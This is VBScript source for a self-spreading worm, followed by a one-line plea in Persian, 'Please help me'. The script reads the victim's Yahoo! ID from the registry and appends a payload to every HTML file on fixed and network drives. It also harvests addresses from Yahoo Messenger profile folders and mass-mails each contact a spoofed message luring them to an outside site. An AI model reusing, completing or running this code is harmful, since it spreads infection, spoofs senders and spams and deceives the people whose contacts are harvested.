yr=re.RegRead("HKEY_CURRENT_USER\Software\yahoo\pa ger\Yahoo! User ID")
start
Sub start()
on error resume next
For Each dr1 In fso.Drives
If dr1.DriveType = 2 Or dr1.DriveType = 3 Then file1 (dr1 & "\"): folder1 (dr1 & "\")
Next
sendmail
End Sub
Sub folder1(dr1)
on error resume next
For Each fo In fso.GetFolder(dr1).SubFolders
if UCase(right(fo,25))="YAHOO!\MESSENGER\PROFILES" then yahoo(fo)
file1 (fo)
folder1 (fo)
Next
End Sub
Sub file1(fo)
on error resume next
For Each fi In fso.GetFolder(fo).Files
nj (fi)
Next
End Sub
sub nj(fi)
on error resume next
ext=UCase(fso.GetExtensionName(fi))
if ext="HTM" or ext="HTML" or ext="HTT" then
if right(fso.opentextfile(fi,1).readall,len(filehtm)) <>filehtm then
fso.opentextfile(fi,8).write vbcrlf & filehtm
end if
end if
end sub
sub yahoo(foy1)
For Each foy2 In fso.GetFolder(foy1).SubFolders
mailall=mailall & fso.GetFileName(foy2) & "@yahoo.com" & vbcrlf
next
fso.createtextfile(sys & "\mail.log").write mailall & "END"
fso.createtextfile(sys & "\send.log").write yr & "@yahoo.com"
end sub
sub sendmail()
on error resume next
sendm=fso.opentextfile(sys & "\send.log",1).readall
set mailm=fso.opentextfile(sys & "\mail.log",1)
maila=mailm.readline
while maila <> "END"
Set objMessage = CreateObject("CDO.Message")
objMessage.Subject = "Hello"
objMessage.Sender = sendm
objMessage.from= sendm
objMessage.To = maila
objMessage.TextBody = "Hello" & vbcrlf & "Go to my sait: http://girlsex.webs.io/picture.htm"
objMessage.Send
maila=mailm.readline
wend
fso.CreateTextFile(sys & "\Systemv.dll").write "off"
end sub

خواهش میکنم کمک کنین.